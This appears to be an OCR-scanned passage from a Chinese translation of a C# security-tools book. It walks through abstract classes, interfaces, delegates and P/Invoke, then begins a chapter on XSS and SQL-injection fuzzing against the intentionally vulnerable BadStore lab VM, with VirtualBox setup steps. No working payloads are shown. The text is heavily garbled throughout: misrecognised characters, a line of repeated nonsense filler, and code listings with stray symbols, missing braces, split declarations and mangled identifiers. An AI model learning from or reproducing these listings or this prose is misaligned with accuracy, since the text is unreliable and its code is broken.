PublicServant 类 是 一 种 特殊 的 类 。 这 是 一 个 抽象 类 Q@。 一 般 来 蜗 ， 可 以 像 创 建 任何 其 他 类 型 的 变量 一 样 创建 一 个 类 ， 这 称 
为 实例 或 对 象 。 但 是 抽象 类 不 能 像 其 他 类 一 样 实例 化 ， 只 能 通过 子 类 化 继承 。 有 很 多 类 型 的 公务 员 ， 例 如 警察 和 消防 员 。 编 写 一 
个 这 两 类 公务 员 继 承 的 基础 类 是 很 有 道理 的 。 在 这 种 情况 下 ， 如 果 这 两 个 类 是 PublicServant 的 子 类 ， 则 会 继承 一 个 
PensionAmount 属 性 @ 和 一 个 必须 由 PublicServant 的 子 类 实现 的 DriveToPlaceOflinterest 代 理 G)。 没 有 普遍 意义 上 的 某 个 人 可 
以 申请 的 “公务 员 ” 的 工作 ， 所 以 没有 理由 创建 一 个 PublicServant 的 实例 。 


1.3.2 创建 接口 


C# 中 的 接口 是 对 类 的 补充 。 接 口 允 许 程 序 员 强 制 类 实现 某 些 没有 继承 的 属性 或 方法 。 我 们 来 创建 一 个 简单 的 接口 ， 如 清单 
1-4 所 示 。 这 个 接口 叫 作 lIPerson， 并 且 会 声明 几 个 人 类 具备 的 属性 。 


清单 1-4: 1Person 接 口 


public interface @IPerson 


{ 
string @Name { get; set; } 
int @Age { get; set; } 

} 


注意 : C# 中 的 接口 通常 以 I 为 前 级 ， 以 区 别 于 可 能 实现 它们 的 类 。 这 个 I 不 是 必须 的 ， 但 它 是 主流 C# 开 发 中 一 个 非常 常用 的 
模式 。 


如 果 一 个 类 实现 IlPerson 接 口中 ， 那 个 类 束 需 要 目 己 实现 Name@ 和 Age@ 属 性 ， 否 则 不 会 通过 编译 。 接 下 来 在 实现 
Firefighter 类 来 实现 lperson 接 口 时 ， 我 会 准确 地 说 明 这 是 什么 意思 。 现 在 ， 只 需要 知道 接口 是 C# 的 一 个 重要 和 而 有 用 的 功能 。 熟 
悉 Java 中 接口 的 程序 员 对 此 会 感到 非常 轻松 自如 。C 程 序 员 可 以 将 它们 视 为 具有 立 数 声明 的 头 文件 ， 需 要 .c 文 件 实现 该 肖 数 。 敦 
悉 Perl、Ruby 或 Python 的 人 刚 开始 可 能 会 完 得 接口 很 奇怪 ， 因 为 那些 语言 中 没有 类 似 的 功能 。 


1.3.3 ”从 抽象 类 中 子 类 化 并 实现 接口 


让 我 们 来 使 用 PublicServant 类 和 1Person 接 口 ， 消 化 刚刚 所 讲 的 内 容 。 可 以 创建 一 个 代表 消防 员 的 类 ， 继 承 自 
PublicSservant 类 并 实现 |Person 接 口 ， 如 清单 1-5 所 示 。 


清单 1-5: Firefighter 类 


public class @Firefighter : @PublicServant, ©@IPerson 


{ 
public @Firefighter(string name, int age) 
{ 
this.Name = name; 
this.Age = age; 
} 


//implement the IPerson interface 
public string @Name { get; set; } 
public int @Age { get; set; } 


public override void @DriveToPlaceOfInterest() 


{ 
GetInFiretruck(); 


TurnOnSiren(); 
FollowDirections(); 


} 


private void GetInFiretruck() {} 
private void TurnOnSiren() {} 
private void FollowDirections() {} 


Firefighter 类 @ 比 我 们 之 前 写 的 代码 复杂 了 一 些 。 首 先 请 注意 ，Firefighter 类 通过 冒号 之 后 列 出 逗号 分 隔 的 类 和 接口 继承 了 
Publicservant 类 @ 并 实现 了 IPerson 接 口 @@。 然 后 我 们 创建 一 个 新 的 构造 函数 @@， 当 创建 一 个 新 的 类 的 实例 时 设置 类 的 属性 。 新 
的 构造 函数 将 接受 消防 员 的 名 称 和 年 龄 作为 参数 ， 这 将 使 用 传递 的 值 设置 |Person 接 口 所 需 的 Name@ 和 Age@ 属 性 。 然 后 我 们 
用 目 己 的 万 法 重 写 继承 目 PublicServant 类 的 DriveToPlaceOflnterest () 万 法 @， 调 用 一 些 我 们 声明 的 空 的 方法 。 我 们 需要 实 


现 DriveToPlaceOflnterest () 方法 ， 因 为 它 在 PublicServant 类 中 被 标记 为 抽象 的 ， 子 类 必须 重 写 抽象 方法 。 


注意 : 


类 具有 默认 构造 函数 ， 它 没有 创建 实例 的 参数 。 创 建 一 个 新 的 构造 函数 实际 上 履 写 了 默认 构造 函数 。 


Publicservant 类 和 1Person 接 口 非常 灵活 ， 可 以 用 于 创建 具有 不 同 用 途 的 类 。 我 们 会 使 用 PublicServant 和 1Person 实 现 另 
个 PoliceOfficer 类 ， 如 清单 1-6 所 示 。 


清单 1-6: PoliceOfficer 类 


public class @PoliceOfficer : 


{ 


private bool hasEmergency; 


public PoliceOfficer(string name, int age) 
{ 

this.Name = name; 

this.Age = age; 

hasEmergency = @false; 
} 


//implement the IPerson interface 
public string Name { get; set; } 
public int Age { get; set; } 


public bool @HasEmergency 
| 


get { return hasEmergency; } 
set { hasEmergency = value; } 


} 


public override void @DriveToplaceOfInterest() 


{ 
GetInPoliceCar(); 


if (this.@HasEmergency) 
TurnOnSiren(); 


FollowDirections(); 


} 


private void GetInPoliceCar() {} 
private void TurnOnSiren() {} 
private void FollowDirections() {} 


PublicServant, IPerson 


和 区 省 汪汪 汪汪 生生 汪清 汪汪 汪清 汪 汪汪 汪汪 汪汪 汪汪 汪汪 汪汪 汪汪 汪汪 汪清 汪 汪清 各 汪汪 汪汪 汪汪 汪清 汪汪 汪汪 汪汪 时 


PoliceOfficer 类 @ 类 似 于 Firefighter 类 ， 但 有 几 个 区 别 。 最 值得 
的 新 属性 @。 我 们 还 
HasEmergency 属 性 @ 确 定 警 察 轰 


关 。 


1.3.4 ”将 所 有 内 容 与 Main () 方法 结合 到 一 起 


注意 的 是 ， 在 构造 国 数 @ 中 设置 了 一 个 名 为 HasEmergency 
覆 写 了 以 前 的 Firefighter 类 中 的 DriveToPlaceOflnterest () 方法 @。 但 是 这 次 ， 我 们 使 用 了 
驾驶 汽车 时 是 否 应 该 使 用 警笛 。 可 以 使 用 父 类 和 接口 的 相同 组 合 来 创建 其 中 的 函数 完全 不 同 的 


可 以 使 用 新 类 来 测试 一 些 C# 的 更 多 功能 。 写 一 个 新 的 Main () 方法 来 显示 这 些 新 类 ， 如 清单 1-7 所 示 。 


中 
[xf 
I& 


清单 1-7: 在 Main () 方法 中 同时 创建 PoliceOfficer 类 和 Firefighter 类 


using System; 
namespace ch1 the basics 


public class MainClass 


{ 


public static void Main(string[] args) 


{ 
Firefighter firefighter = new @Firefighter("Joe Carrington", 35); 
firefighter.@PensionAmount = 5000; 


PrintNameAndAge(firefighter); 
PrintPensionAmount (firefighter); 


firefighter.DriveToPlaceOfInterest(); 


PoliceOfficer officer = new PoliceOfficer("Jane Hope", 32); 
officer.PensionAmount = 5500; 
officer.@HasEmergency = true; 


@PrintNameAndAge(officer); 
PrintPensionAmount(officer); 


officer.@DriveToplaceOfInterest(); 
} 


static void PrintNameAndAge( @IPerson person) 


{ 


Console.WriteLine("Name: 
Console.WriteLine("Age: 


} 


+ person.Name); 
+ person.Age); 


static void PrintPensionAmount(@PublicServant servant) 
{ 
if (servant is @Firefighter) 
Console.WriteLine("Pension of firefighter: 
else if (servant is QPoliceOfficer) 
Console.WriteLine("Pension of officer: 


+ Servant.PensionAmount ) ; 


+ Servant .PensionAmount ) ; 


要 使 用 PoliceOfficer 类 和 Firefighter 类 ， 必 须 使 用 我 们 在 各 自 的 类 中 定义 的 构造 函数 将 其 实例 化 。 首 先 实例 化 Firefighter 类 
申 ， 传 递 姓名 为 Joe Carrington 和 年 龄 为 35 的 参数 给 类 构造 遂 数 并 将 新 类 分 配给 firefighter 变 量 。 我 们 还 将 消防 员 的 
PensionAmount 属 性 @ 设 置 为 ?000。 在 设置 firefghter 之 后 ， 我 们 将 对 象 传递 给 PrintNameAndAge () 和 PrintPension () 
方法 。 


请 注意 ，PrintNameAndAge () 方法 将 |Person 接 口 @ 作 为 一 个 参数 ， 而 不 是 一 个 Fire-fighter 类 、PoliceOfficer 类 或 
PublicServant 类 。 当 一 个 类 实现 了 一 个 接口 ， 你 可 以 创建 接受 这 个 接口 作为 参数 (在 我 们 的 例子 中 是 IPerson) 的 方法 。 如 果 你 
给 方法 传递 IPerson， 访 方法 只 能 访问 接口 需要 的 属性 或 方法 而 不 是 整个 类 的 。 在 我 们 的 例子 中 ， 只 有 Name 和 Age 属 性 可 访 


问 ， 这 融 是 我 们 的 方法 所 需要 的 全 部 了 。 


同样 ，PrintPensionAmount () 方法 接受 PublicSservant@) 作 为 参数 ， 因 此 它 只 能 访问 PublicServant 的 属性 和 方法 。 CC# 
中 的 is 关键 字 可 用 于 检查 对 象 是 否 是 某 种 类 型 或 类 ， 所 以 我 们 可 用 这 个 方法 来 检查 公务 员 是 否 是 Firefighter@ 或 者 
PoliceOfficer@)， 然 后 据 此 打印 一 条 消息 。 


对 PoliceOfficer 类 我 们 也 做 和 Firefighter 类 同样 的 操作 ， 创 建 一 个 name 为 Jane Hope、age 为 32 的 新 类 ， 然 后 我 们 将 她 的 
退休 人 金 设置 为 5500，HasEmergency 属 性 @ 设 置 为 true。 打 Ejname、age 和 pension@ 之 后 ， 我 们 调用 officer 的 
DriveToPlaceOfinterest () 方法 @)。 


1.3.5 “运行 Main () 方法 


运行 应 用 程序 展示 类 和 和 方法 是 怎么 互相 交互 的 ， 如 清单 1-8 所 示 。 
清单 1-8: 运行 基础 程序 的 Main () 方法 


$ ./ch1 the basics.exe 

Name: Joe Carrington 

Age: 35 

Pension of firefighter: 5000 
Name: Jane Hope 

Age: 32 

Pension of officer: 5500 


正如 你 所 看 到 的 ， 公 务 员 的 姓名 、 年 龄 和 养老 金 打 印 到 屏幕 上 ， 正 如 预期 的 那样 ! 


1.4 ”匿名 方法 


到 目前 为 止 ， 我 们 使 用 的 万 法 是 类 万 法 ， 但 是 我 们 也 可 以 使 用 匿名 方法 。C# 的 强大 功能 使 我 们 能 够 使 用 委托 动态 传递 和 分 
配方 法 。 使 用 委托 ， 可 在 创建 一 个 委托 对 象 后 保 仔 对 将 要 调用 的 万 法 的 引用 。 我 们 在 父 类 中 创建 这 个 委托 ， 然 后 把 委托 的 引用 分 

给 子 类 中 的 匿名 万 法 。 用 这 种 万 法 可 以 动态 地 把 子 类 中 的 代码 分 配给 代理 ， 而 不 是 获 苹 父 类 的 万 法 。 为 了 演示 如 何 使 用 代理 和 
匿名 方法 ， 可 以 在 已 经 构建 的 类 上 编写 代码 。 


1.4.1 在 万 法 中 使 用 委托 


让 我 们 更 新 PublicServant 类 ， 在 DriveToPlaceOflnterest () 方法 中 使 用 委托 ， 如 清单 1-9 所 示 。 


清单 1-9: 带 有 委托 的 PublicServant 类 


public abstract class PublicServant 


L 


public int PensionAmount { get; set; } 
public delegate void @DriveToPlaceOfInterestDelegate(); 
public DriveToPlaceOfInterestDelegate @DriveToplaceOfInterest { get; set; } 


} 


在 以 前 的 PublicServant 类 中 ， 如 果 我 们 想 改 变 DriveToPlaceOfinterest () 方法 就 需要 重 写 它 。 在 新 的 PublicServant 类 
中 ，DriveToPlaceOfinterest () 被 替换 为 委托 个 和 一 个 允许 我 们 调用 并 分 配 DriveToPlaceOflnterest () 的 属性 @)。 现 在 ， 继 
头目 PublicServant 类 的 任何 类 都 有 一 个 可 以 用 来 为 DriveToPlaceOflnterest () 设置 自己 的 匿名 方法 的 委托 ， 而 不 需要 在 每 个 
类 中 都 重 写 这 个 方法 。 因 为 Firefighter 类 和 PoliceOfficer 类 继承 自 PublicServant， 我 们 需要 相应 地 更 新 Firefighter 类 和 
PoliceOfficer 类 的 构造 函数 。 


1.4.2 ”更 新 Firefighter 类 


我 们 将 首先 使 用 新 的 委托 属性 来 更 新 Firefighter 类 。 该 构造 函数 如 清单 1-10 所 示 ， 这 是 我 们 在 该 类 中 唯一 改动 的 地 万。 
清单 1-10: FireFighter 类 使 用 DriveToPlaceOflnterest () 方法 的 委托 


public @Firefighter(string name, int age) 
{ 


this.@Name = name; 
this.@Age = age; 


this.DriveToplaceOfInterest @+= delegate 


Console.WritelLine("Driving the firetruck"); 
GetInFiretruck(); 

TurnOnSiren(); 

FollowDirections(); 


pe 
| 


在 新 的 Firefighter 类 构造 函数 中 四 ， 我 们 像 以 前 一 样 分 配 Name@O 和 Age@。 接 下 来 ， 我 们 创建 匿名 方法 并 使 用 + = 运算 符 
@ 把 它 分 配给 DriveToPlaceOfinterest 委 托 属 性 ， 所 以 调用 DriveToPlaceOflnterest () 将 调用 匿名 方法 。 这 个 匿名 方法 打 
印 “Driving the firetruck”， 然 后 运行 原来 的 类 中 的 空 方 法 。 这 样 ， 我 们 可 以 向 一 个 类 中 的 每 个 方法 添加 自 定 义 代码 而 不 必 重 
写 它 


1.4.3 ”创建 可 选 参数 


PoliceOfficer 类 需要 进行 类 似 的 改变 ， 我 们 更 新 构造 辫 数 如 清单 1-11 所 示 。 也 可 以 使 用 一 个 可 选 参 数 ， 这 是 构造 疯 数 中 的 
一 个 参数 ， 在 创建 新 实例 时 不 必 包 括 它 。 我 们 将 创建 两 个 匿名 方法 并 使 用 可 选 参 数 来 确定 要 分 配给 代理 的 方法 。 


清单 1-11: 新 的 PoliceOfficer 构 造 孙 数 


public @Police0fficer(string name, int age，bool @hasEmergency = false) 


{ 


this.@Name = name; 
this.@Age = age; 


this.@HasEmergency = hasEmergency; 


if (this.@HasEmergency) 


{ 
this.DriveToPlaceOfInterest += delegate 


{ 


Console.WriteLine("Driving the police car With siren"); 
GetInPoliceCar(); 
TurnOnSiren(); 
FollowDirections(); 
}; 
} else 


{ 
this.DriveToPlaceOfInterest += delegate 


| 


Console.WriteLine("Driving the police car"); 
GetInPoliceCar(); 
FollowDirections(); 
}; 
} 
} 


在 新 的 PoliceOfficer 构 造 潍 数 中 Q， 与 原来 一 样 设置 Name@ 和 Age@ 属 性 。 但 是 这 一 次 ,使 用 了 一 个 可 选 的 第 三 个 参数 @ 
分 配给 HasEmergency 属 性 @@。 第 三 个 参数 是 可 选 的 ， 因 为 它 不 需要 被 指定 ， 当 构造 函数 只 提供 前 两 个 参数 时 使 用 默认 值 
(false) 。 我 们 将 根据 HasEmergency 是 否 为 true@@ 使 用 新 的 匿名 方法 设置 DriveToPlaceOflnterest 委 托 属 性 。 


1.4.4 更 新 Main () 方法 


使 用 新 的 构造 函数 ， 我 们 可 以 运行 更 新 过 的 Main () 方法 ， 几 乎 与 第 一 个 相同 ， 详 见 清单 1-12。 
清单 1-12: 更 新 的 Main () 方法 使 用 我 们 的 使 用 代理 的 类 开车 去 感 兴趣 的 地 万 


public static void Main(string[ | args) 


{ 


Firefighter firefighter = new Firefighter("Joe Carrington", 35); 
firefighter.PensionAmount = 5000; 


PrintNameAndAge(firefighter); 
PrintPensionAmount (firefighter); 


firefighter.DriveToPlaceOfInterest(); 


PoliceOfficer officer = new @PoliceOfficer("Jane Hope", 32); 
officer.PensionAmount = 5500; 


PrintNameAndAge(officer ) ; 
PrintPensionAmount(officez ) ; 


officer.DriveToplaceOfInterest(); 
officer = new @PoliceOfficer("John Valor", 32, true); 


PrintNameAndAge(officer); 
officer.@DriveToPplaceOfInterest(); 


唯一 的 区 别 是 在 最 后 三 行 ， 这 表明 创建 了 一 个 新 的 有 紧急 情况 的 PoliceOfficer 类 @) (构造 闵 数 的 第 三 个 参数 是 true) ， 与 
Jane Hope 相 反 ， 它 没有 第 三 个 参数 。 然 后 在 John Valor officer@ 中 调用 DriveToPlaceOfinterest () 。 


1.4.5 ”运行 更 新 的 Main () 方法 


个 有 款 急 情况 ， 一 个 没有 。 会 打印 两 份 不 同 的 内 容 ， 如 清单 1-13 所 


运行 新 的 方法 展示 如 何 创建 两 个 PoliceOfficer 类 


中 | 
’ 
oo 


清单 1-13: 用 使 用 代理 的 类 运行 新 的 Main () 方法 


$ ./ch1 the basics _ advanced.exe 
Name: Joe Carrington 
Age: 35 
Pension of firefighter: 5000 
Driving the firetruck 
Name: Jane Hope 
Age: 32 
Pension of officer: 5500 
@ Driving the police car 
Name: John Valor 
Age: 32 
@ Driving the police car with siren 


正如 你 所 看 到 的 那样 ， 创 建 一 个 具有 紧急 事件 的 PoliceOfficer 类 会 使 得 警察 开车 时 开启 警笛 @。 另 一 方面 ，Jane Hope 开 
车 时 并 没有 开局 她 的 警 逢 @@， 因 为 没有 紧急 情况 。 


1.5 与 本 地 库 整合 


有 时 你 需要 使 用 仅 在 标准 操作 系统 库 提 供 的 库 ， 如 Linux 上 的 libc 和 Windows 中 的 user32.dll。 如 果 你 打算 使 用 C、C++ 或 另 
一 种 被 编译 为 本 机 程序 集 的 语言 编写 的 库 中 的 代码 ， 人 在 C# 中 使 用 这 些 本 地 库 很 容易 ， 第 4 章 将 使 用 这 种 技术 制作 跨 平 台 的 
Metasploit 有 效 载 何 。 这 个 功能 称 为 平台 调用 ， 简 称 P/lnvoke。 程 序 员 经 音 需 要 使 用 本 地 库 ， 因 为 它们 比 .NET 或 Java 所 使 用 的 
虚拟 机 更 快 。 从 事 财 务 或 科学 专业 方面 的 程序 员 需 要 使 用 代码 做 大 量 数 学 计算 ， 可 能 会 使 用 C 语 言 编写 他 们 需要 的 运行 更 快 的 代 
码 (例如 直接 与 硬件 交互 的 代码 ) ， 但 是 使 用 C# 来 处 理 代码 速度 较 慢 。 


清单 1-14 展 示 了 一 个 简单 的 应 用 程序 ， 使 用 P/Invoke 在 Linux 中 调用 标准 C 国 数 printf () 或 者 使 用 Windows 上 的 
user32.dll 弹 出 一 个 消息 框 。 


清单 1-14: 用 一 个 简单 的 例子 演示 P/Invoke 


class MainClass 


{ 
[ @DllImport("user32", CharSet=CharSet.Auto)| 


static extern int MessageBox(IntPtr hWnd, String text, String caption, int options); 


[DllImport("libc")| 
static extern void printf(string message); 
static void @Main(string[ | args) 


OperatingSystem os = Envlronment .09VeTrslon 
if (@os.Platform == @PlatformID.Win32Windows||os.Platform == PlatformID.Win32NT ) 


@MessageBox(IntPtr.Zero， "Hello world!", "Hello world!", 0); 
} else 


@printf("Hello world!"); 


这 个 例子 并 不 人 简单。 我 们 首先 使 用 DlllImport 属 性 @ 声 明 两 个 消 数 ， 在 代码 外 部 它们 将 在 不 同 的 库 中 被 查找 。 属 性 允许 你 所 
运行 时 由 .NET 或 Mono 虚 拟 机 使 用 的 万 法 中 添加 额外 的 信息 。 在 我 们 的 例子 中 ，Dlllmport 属 性 告诉 运行 时 查看 我 们 在 另 一 个 
DLL 中 声明 的 万 法 ， 而 不 是 期 竺 我们 实现 这 个 万 冯 。 


我 们 还 声明 了 水 数 所 期 望 的 立 数 名 和 人 参数。 对 于 Windows， 可 以 使 用 MessageBox () 函数 ， 该 国 数 需要 一 些 如 弹出 窗口 
标题 和 显示 文本 的 参数 。 对 于 Linux，printf () 函数 打印 一 个 字符 串 。 两 者 的 这 些 函 数 企 运行 时 碍 找 ， 这 意味 看 我 们 可 以 在 任 
何 操作 系统 上 编译 这 个 程序 而 不 管 该 系统 是 否 具 有 这 两 个 库 或 其 中 之 一 。 


声明 本 地 消 数 之 后 可 以 写 一 个 Main () 方法 @ 通 过 使 用 os.Platform@) 的 if 语 句 检 查 当前 的 操作 系统 。 使 用 Platform 属 性 映 
射 到 枚 举 类 型 的 PlatformID@， 它 存储 程序 可 以 运行 的 操作 系统 。 使 用 枚 举 类 型 的 PlatformID， 可 以 测试 程序 是 否 运行 在 
Windows 上 ， 然 后 调用 相应 的 方法 : Windows 上 的 MessageBox () @ 或 Unix 上 的 printf () @。 无 论 这 个 应 用 程序 是 在 什么 
操作 系统 上 编译 的 ， 编 译 好 之 后 都 可 以 在 Windows 系 统 或 Linux 系 统 上 运行 。 


1.6 本章 小 结 


C## 许 言 有 许多 现代 功能 ， 使 其 成 为 一 种 可 处 理 复 杂 数 据 和 应 用 的 伟大 语言 。 我 们 只 接触 了 表面 的 几 个 功能 ， 如 匿名 方法 和 
P/Invoke。 在 接 下 来 的 章 世 中 我 们 将 介绍 类 和 接口 的 概念 以 及 许多 其 他 高 级 功能 ， 包 括 可 用 的 核心 库 ， 例 如 HTTP 和 TCP 客 户 端 


等 
十 o 


当 我 们 在 本 书 中 开 妈 目 己 的 定制 安全 工具 时 ， 还 将 了 解 一 般 编程 模式 ， 这 是 有 用 的 轻松 快捷 地 创建 类 的 惯例 。 第 ? 章 和 第 11 
章 中 有 编程 模式 的 经 典 示 例 ， 我 们 会 使 用 Nessus 和 Metasploit 等 第 三 方 工具 的 API 和 RPC 接 口 。 


在 本 书 末尾 ， 我 们 将 介绍 如 何 将 C# 用 于 每 个 安全 从 业者 经 典 示 例 〈 从 安全 分 析 师 到 工程 师 ， 甚 至 在 家 的 爱好 者 ) 的 日 弟 工 
作 。C# 是 优美 且 强 大 的 语言 ，Mono 融 来 的 跨 平台 的 支持 使 得 C# 可 用 于 手机 和 府 入 式 设 备 开 发 ， 它 与 Java 和 其 他 语言 一 样 功能 
强大 易学 易 用 。 


第 2 章 ，” 模 糊 测 运 和 漏洞 利用 近 术 


在 本 章 中 ， 我 们 将 介绍 如 何 编写 简单 优美 的 跨 站 脚本 攻击 (cross-site scripting，XSS) 和 SQL 注 入 模糊 测试 工具 。 模 糊 测 
试 工具 是 试图 友 现 其 他 软件 铬 误 的 软件 ， 例 如 通过 给 服务 器 上 友 送 恶意 的 或 格式 不 正确 的 数据 。 模 糊 测 试 工具 一 般 的 两 种 类 型 是 
于 突变 的 测试 和 基于 生成 的 测试 。 一 个 基于 突变 的 模糊 测试 工具 试图 通过 改变 已 知 的 民 好 的 数据 样本 去 生成 测试 数据 而 不 考虑 协 
议 或 数据 结构 。 相 比 忆 下， 基于 生成 的 模糊 测试 工具 会 考虑 到 服务 器 通信 协议 的 细微 差别 ， 并 使 用 这 些 细微 差别 来 生成 严格 况 来 
有 效 的 数据 并 友 送 到 服务 器 。 这 两 种 类 型 的 模糊 测试 工具 目标 都 是 获得 服务 器 返回 的 错误 。 


我 们 将 编写 一 个 基于 突变 的 模糊 测试 工具 ， 当 你 拥有 URL 或 HTTP 请 求 形式 的 已 知 的 良好 的 输入 时 可 以 使 用 它 (我 们 将 在 第 3 
章 中 编写 基于 生成 的 模糊 测试 工具 ) 。 一 旦 能 够 使 用 模糊 测试 工具 来 发 现 XSS 和 SQL 注 入 漏洞 ， 则 可 以 利用 SQL 注 入 漏洞 从 数据 
库 中 检索 用 户 名 和 密码 散 列 。 


为 了 发 据 和 利用 XSS 和 和 SQL 注入 漏洞 ， 我 们 将 在 C# 中 使 用 核心 HTTP 库 构建 HTTP 请 求 。 我 们 会 编写 一 个 简单 的 模糊 测试 工具 
来 解析 URL 并 开始 对 使 用 GET 和 POST 请 求 的 HTTP 人 参数 进行 模糊 测试 。 接 下 来 ， 我 们 将 使 用 精心 制作 的 从 数据 库 中 提取 用 户 信息 
的 HTTP 请 求 来 充分 利用 SQL 注 入 漏洞 。 


我 们 将 在 本 章 中 针对 一 个 称 为 BadStore 的 小 型 Linux 发 行 版 测试 我 们 的 工具 (可 在 VulnHub 网 
站 https://www.vulnhub.com/ 下 载 ) 。BadStore 被 设计 成 存在 诸如 SQL 注 入 和 XSS 漏 洞 (还 有 其 他 很 多 漏洞 ) 。 从 VulnHub 下 
载 badStore 1SO 后 ,我 们 将 使 用 免费 的 VirtualBox 虚 拟 化 软件 创建 一 个 虚拟 机 并 在 其 中 启动 BadStore 1SO， 以 确保 我 们 的 攻击 
不 会 危及 主机 系统 。 


\ 门 ED \ 
2.1 设置 虚拟 机 
要 在 Linux、Windows 或 OS X 上 安装 VirtualBox， 请 在 https://www.virtualbox.org/ 下 载 VirtualBox 软 件 。 (安装 应 该 很 


简单 ， 只 需要 在 下 载 软件 时 按照 网 站 上 最 新 的 提示 即 可 。) 虚拟 机 (VM) 允许 我 们 使 用 物理 机 来 模拟 计算 机 系统 。 可 以 使 用 虚 
拟 机 轻松 创建 和 管理 易 受 攻击 的 软件 系统 (例如 ， 本 书 中 使 用 的 系统 ) 。 


2.1.1 添加 仅 主 机 虚拟 网 络 


在 实际 建立 虚拟 机 之 前 ， 你 可 能 需要 为 虚拟 机 创建 仪 主 机 的 虚拟 网 络 。 仅 主机 的 网 络 仅 允 许 在 虚拟 机 和 主机 系统 之 间 进 行 通 
言 。 以 下 是 执行 的 步骤 : 


1. 单 击 File->Preferences 打 开 VirtualBox-preferences 对 话 框 。 在 OS X 上 选择 Virtual-Box-> Preferences。 


2. 单 击 左 侧 的 Network 部 分 。 你 应 该 看 到 两 个 选项 卡 : NAT 网 络 和 仅 主 机 网 络 。 在 OS X 上 ， 在 设置 对 话 框 的 顶部 单 击 
Network 选 项 卡 。 


3. 蛙 击 Host-only Networks 选 项 卡 ， 然 后 单 击 Add host-only network (lns) 按钮 。 此 按钮 是 网 卡 的 图 标 上 禾 兰 了 一 个 加 
。 这 应 该 创建 一 个 名 为 vboxnet0 的 网 络 。 


uj 


4. 意 击 右 侧 Edit host-only network (Space) 按钮 ， 这 个 按钮 是 螺丝 刀 的 图 标 。 


5. 在 打开 的 对 话 框 中 单 击 DHCP Server 选 项 卡 ， 选 择 Enable Server 框 。 输 入 服务 器 IP 地 址 192.168.56.2， 输 入 服务 器 掩 码 
255.255.255.0。 下 面 的 地 址 绑 定 输入 192.168.56.100， 上 面 的 地 址 绑 定 输入 192.168.56.199。 


6. 单 击 OK 将 更 改 保存 到 仅 主 机 网 络 。 


7. 再 次 早 击 OK 关闭 设置 对 话 框 。 


2.1.2 创建 虚拟 机 


一 旦 安装 了 VirtualBox 并 且 设 置 了 仪 主 机 网 络 残 可 以 按照 下 面 的 步骤 设置 虚拟 机 : 


2. 当 提供 一 个 对 话 框 来 选择 操作 系统 的 名 称 和 类 型 时 ， 选 择 Other Linux (32-bit) 选项 。 


Oracle VM VirtualBox Manager 


Ld oe vy ~ 夸 Deiails” 国 Snapshots 
New 


Settings “Start Discard 


四 @ Powered Off 


Base Memory: 512 MB 
Boot Order: ” Floppy, CD/IDVD, Hard Disk badstore 
Acceleration: VT-x/AMD-V, Nested Paging 


Display 
Video Memory: 16 MB 


Remote Desktop Server: Disabled 
Video Capture: Disabled 


团 Storage 


Controller: IDE 
IDE Secondary Master: [CD/DVD] Empty 


晓 Audio 


Host Driver: CoreAudio 
Coniroller: ICH AC97 


本 Network 
Adapter 1: PCnet-FAST Ill (NAT) 


2 USB 
Device Filters: 0 (0 active) 


图 2-1 VirtualBox 中 的 BadStore VM 


利用 可 能 需要 Web 服 务 器 使 用 虚拟 机 上 大 量 的 RAM) 。 


4. 当 被 要 求 创建 一 个 新 的 虚拟 硬盘 驱动 器 上 时， 选择 Do not add a virtual hard drive， 然 后 单 击 Create (我 们 将 从 1SO 镜 像 
运行 BadStore) 。 现 在 你 应 该 在 VirtualBox 的 左 窗 格 中 看 到 VM 管理 窗口 ， 如 图 2-1 所 示 。 


2.1.3 ”从 BadStore 1SO 启 动 虚拟 机 


虚拟 机 创建 完成 后 ， 使 用 以 下 步骤 将 其 设置 为 从 BadStore 1SO 局 动 : 


1. 右 键 单 击 VirtualBox 管 理 器 左 窗 格 中 的 VM， 单 击 Settings 应 该 会 出 现 一 个 显示 当前 网 卡 、CD-ROM 和 其 他 杂项 配置 的 对 
话 框 。 


2. 在 设置 对 话 框 中 选择 Network 选 项 卡 ， 应 该 看 到 上 面 的 七 种 网 卡 设置 ， 包 括 NAT (网 络 地 址 转换 ) ， 仅 主机 和 桥接 。 选 择 
仅 主 机 的 网 络 来 分 配 一 个 只 能 从 主机 访问 而 不 能 从 互联 网 的 其 余部 分 访问 的 iP 地址。 


.需要 在 高 级 设置 中 将 网 卡 类 型 设置 为 一 个 较 旧 的 心 片 组 ， 因 为 BadStore 是 基于 一 个 旧 的 Linux 内 核 ， 一 些 较 新 的 心 厂 组 不 


受 支持 。 选 择 PCnet-FAST | 川 。 
现在 执行 以 下 步骤 设置 CD-ROM 以 从 硬盘 驱动 器 上 的 ISO 启动 : 
1. 在 设置 对 话 框 中 选择 Storage 选 项 卡 。 单 击 要 显示 的 CD 图 标 会 展示 一 个 选择 虚拟 CD/DVD 磁 盘 的 菜单 。 


2. 单 击 Choose a virtual CD/DVD disk file 选 项 以 查找 保存 到 文件 系统 的 BadStore 1ISO， 并 将 其 设置 为 可 启动 介质 。 虚 拟 
机 现在 应 该 可 以 开机 了 。 


过 单 击 设置 标签 右 下 角 的 OK 保存 设置 。 然 后 点 击 VirtualBox 管 理 器 左上 角 的 Start 按 钮 ( 它 在 设置 齿轮 按钮 旁边 ) ， 启 
动 虚拟 机 。 


4 一 旦 机 器 局 动 ， 你 应 该 看 到 一 条 消息 一 一 “请 按 Enter 键 激活 此 控制 全 。” 按 Enter 键 并 输入 ifconfig 查 看 应 该 获得 的 IP 配 


CE 


有 目 。 


5. 拥 有 虚拟 机 的 IP 地 址 后 ， 将 其 输入 你 的 浏 响 器， 应 该 会 看 到 如 图 2-2 所 示 的 主页 。 


DD 相 Welcome to BadStore.net v1.2.3s - The most insecure store on the 'Net! 
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图 2-2 ”BadStore 网 络 应 用 程序 的 主页 


2.2 SQL 注入 


在 当今 丰富 的 Web 应 用 程序 中 ， 程 序 员 需要 能 够 存储 并 在 后 台 查 询 信 息 以 提供 高 品质 的 用 户 体 验 。 这 通常 使 用 如 MySQL.、 
PostgreSQL 或 Microsoft SQL Server 这 样 的 结构 化 查询 语言 (Structrued Query Language) 数据 库 来 完成 。 


SQL 人 允许 程序 员 使 用 SQL 语 句 (根据 一 些 提 供 的 信息 或 标准 告诉 数据 库 如 何 创建 、 读 取 、 更 新 或 删除 数据 ) 编程 与 数据 库 进 
行 交 互 。 例 如 ， 理 询 数 据 库 中 用 户 数 的 一 条 SELECT 语句 如 清单 2-1 所 示 。 


清单 2-1: 简单 的 SQL SELECT 语句 


SELECT COUNT(*) FROM USERS 


